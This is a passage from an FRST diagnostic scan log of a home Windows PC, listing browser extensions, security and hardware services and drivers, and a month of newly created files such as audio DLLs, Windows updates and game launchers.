CHR Extension: (Google Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-22]
CHR Extension: (Bitdefender Wallet) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fabcmochhfpldjekobfaaggijgohadih [2016-01-22]
CHR Extension: (Google Sheets) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-22]
CHR Extension: (Google Docs Offline) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-22]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-22]
CHR Extension: (Gmail) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-22]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2286848 2015-10-17] (Broadcom Corporation.)
S3 BdDesktopParental; C:\Program Files\Bitdefender\Bitdefender 2015\bdparentalservice.exe [78144 2015-11-11] (Bitdefender)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2787512 2015-12-22] (Microsoft Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [347200 2015-01-15] (WildTangent)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [370064 2015-08-07] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S3 lmhosts; C:\Windows\System32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
S3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NlaSvc; C:\Windows\System32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
R2 nsi; C:\Windows\system32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-01-15] (Realtek Semiconductor)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe [100816 2015-11-11] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe [1561344 2015-12-18] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [1600512 2015-11-11] (BitDefender)
R3 avchv; C:\Windows\system32\DRIVERS\avchv.sys [282000 2015-12-07] (BitDefender)
R3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [775424 2015-11-11] (BitDefender)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [208176 2015-10-17] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7533784 2015-02-14] (Broadcom Corporation)
R1 BdfNdisf; C:\Windows\System32\DriverStore\FileRepository\netlwf.inf_amd64_47566fa3371097e5\bdfndisf6.sys [98768 2014-12-15] (BitDefender LLC)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [115800 2015-12-18] (BitDefender LLC)
S3 bdfwfpf_pc; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf_pc.sys [130656 2015-12-18] (Bitdefender SRL)
R1 BDVEDISK; C:\Windows\system32\DRIVERS\bdvedisk.sys [87912 2015-12-18] (BitDefender)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
R3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R0 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [160032 2015-10-01] (BitDefender LLC)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [477272 2015-10-01] (BitDefender S.R.L.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 

==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-27 17:54 - 2016-01-27 17:54 - 00031325 _____ C:\Users\sesay\Desktop\FRST.txt
2016-01-27 17:51 - 2016-01-27 17:54 - 00000000 ____D C:\FRST
2016-01-27 17:49 - 2016-01-27 17:50 - 02370560 _____ (Farbar) C:\Users\sesay\Desktop\FRST64.exe
2016-01-27 12:28 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Desktop\firewall security.txt
2016-01-27 12:26 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Documents\firewall security.txt
2016-01-27 11:32 - 2016-01-27 11:32 - 00000000 ____D C:\Users\sesay\AppData\Local\Citrix
2016-01-27 11:22 - 2016-01-27 11:22 - 00000000 ___HD C:\OneDriveTemp
2016-01-26 21:52 - 2016-01-26 21:52 - 00000222 _____ C:\Users\sesay\Desktop\Unturned.url
2016-01-25 21:06 - 2016-01-26 21:22 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Trove
2016-01-25 20:54 - 2016-01-25 20:54 - 00000222 _____ C:\Users\sesay\Desktop\Trove.url
2016-01-25 17:23 - 2011-04-13 14:56 - 00245792 _____ C:\Users\sesay\Downloads\MCSkinEdit.jar
2016-01-24 21:05 - 2016-01-24 21:20 - 186613007 _____ C:\Users\sesay\Desktop\Recording #5.mp4
2016-01-24 18:27 - 2016-01-25 17:25 - 54910420 _____ C:\Users\sesay\Downloads\SkinEdit Alpha 3 pre 7 (1).zip
2016-01-22 16:13 - 2016-01-24 21:29 - 00000000 ____D C:\Users\sesay\Desktop\Cloud Drive
2016-01-22 16:01 - 2016-01-22 16:01 - 00002443 _____ C:\Users\sesay\Desktop\AquaKnight563 - Chrome.lnk
2016-01-22 15:48 - 2016-01-22 15:48 - 00927824 _____ (Google Inc.) C:\Users\sesay\Downloads\ChromeSetup.exe
2016-01-22 15:36 - 2016-01-22 15:55 - 00000000 ___RD C:\Users\sesay\Documents\MEGA
2016-01-22 15:33 - 2016-01-22 15:43 - 00000000 ____D C:\Users\sesay\Documents\MEGAsync Downloads
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Local\Mega Limited
2016-01-22 15:31 - 2016-01-22 15:32 - 10335064 _____ (MEGA Limited) C:\Users\sesay\Downloads\MEGAsyncSetup.exe
2016-01-21 09:24 - 2016-01-21 09:24 - 00000000 ____D C:\Users\sesay\Documents\Curse
2016-01-21 09:21 - 2016-01-25 21:39 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse Client
2016-01-21 09:21 - 2016-01-21 09:21 - 00001088 _____ C:\Users\sesay\Desktop\Curse.lnk
2016-01-21 09:21 - 2016-01-21 09:21 - 00001074 _____ C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-01-21 09:20 - 2016-01-21 09:20 - 51968480 _____ (Curse) C:\Users\sesay\Downloads\CurseClientSetup.exe
2016-01-21 09:20 - 2016-01-21 09:20 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse
2016-01-19 19:28 - 2016-01-19 19:28 - 00014155 _____ C:\Users\sesay\Downloads\WORKSHEETCSECTIONCHECKLISTBACKGROUND.pdf
2016-01-15 00:24 - 2016-01-15 00:24 - 10093736 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSSTAPO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 03319456 _____ (Fortemedia Corporation) C:\WINDOWS\system32\FMAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 02157920 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01624744 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01456464 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01377072 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01348880 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01037968 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00704696 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00602984 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.DLL
2016-01-15 00:24 - 2016-01-15 00:24 - 00588632 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00545816 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00479992 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00399464 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00393480 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00355496 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00342272 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioAPO20.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00242768 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFNHK64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00232704 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00225504 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00220136 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00201000 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00176480 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00128512 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00120720 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00105720 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFComm64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00103160 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFSAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102136 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFDAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102128 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFHAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00100544 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097976 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097912 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00093144 _____ (Virage Logic Corporation / Sonic Focus) C:\WINDOWS\SysWOW64\SFCOM.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 72212512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2016-01-15 00:20 - 2016-01-15 00:20 - 03204352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02902264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2016-01-15 00:20 - 2016-01-15 00:20 - 02058880 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioEQ64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02038904 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 01194856 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSstCApoPropPage.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00267208 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00131016 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2016-01-14 19:58 - 2016-01-14 19:58 - 00027740 _____ C:\Users\sesay\Documents\giftbox.3mf
2016-01-13 22:52 - 2016-01-13 22:52 - 00045864 _____ C:\Users\sesay\Downloads\CurrentEvent-AhmadSesay.pdf
2016-01-13 21:39 - 2016-01-04 21:51 - 07477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-01-13 21:39 - 2016-01-04 21:50 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-13 21:39 - 2016-01-04 21:50 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-13 21:39 - 2016-01-04 21:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2016-01-13 21:39 - 2016-01-04 21:49 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-13 21:39 - 2016-01-04 21:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-01-13 21:39 - 2016-01-04 21:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:59 - 22393856 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-13 21:39 - 2016-01-04 20:57 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-13 21:39 - 2016-01-04 20:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00472576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-01-13 21:39 - 2016-01-04 20:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-01-13 21:39 - 2016-01-04 20:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:49 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-01-13 21:39 - 2016-01-04 20:41 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-13 21:39 - 2016-01-04 20:41 - 01070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:40 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:33 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-13 21:39 - 2016-01-04 20:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 07826432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-13 21:39 - 2016-01-04 20:25 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-01-13 21:38 - 2016-01-04 21:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-01-13 21:38 - 2016-01-04 21:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-01-13 21:38 - 2016-01-04 21:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2016-01-13 21:38 - 2016-01-04 21:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-01-13 21:38 - 2016-01-04 21:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-01-13 21:38 - 2016-01-04 20:54 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-01-13 21:38 - 2016-01-04 20:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-01-13 21:38 - 2016-01-04 20:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:50 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-13 21:38 - 2016-01-04 20:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-13 21:38 - 2016-01-04 20:48 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:47 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:44 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:43 - 00953856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-01-13 21:38 - 2016-01-04 20:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-01-13 21:38 - 2016-01-04 20:42 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-01-13 21:38 - 2016-01-04 20:39 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:30 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-13 21:29 - 2016-01-13 21:29 - 00000000 __SHD C:\found.000
2016-01-10 15:27 - 2016-01-10 15:27 - 00001646 _____ C:\Users\sesay\Desktop\Store.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00001829 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-01-03 13:03 - 2016-01-03 13:04 - 00000000 ____D C:\Program Files\iTunes
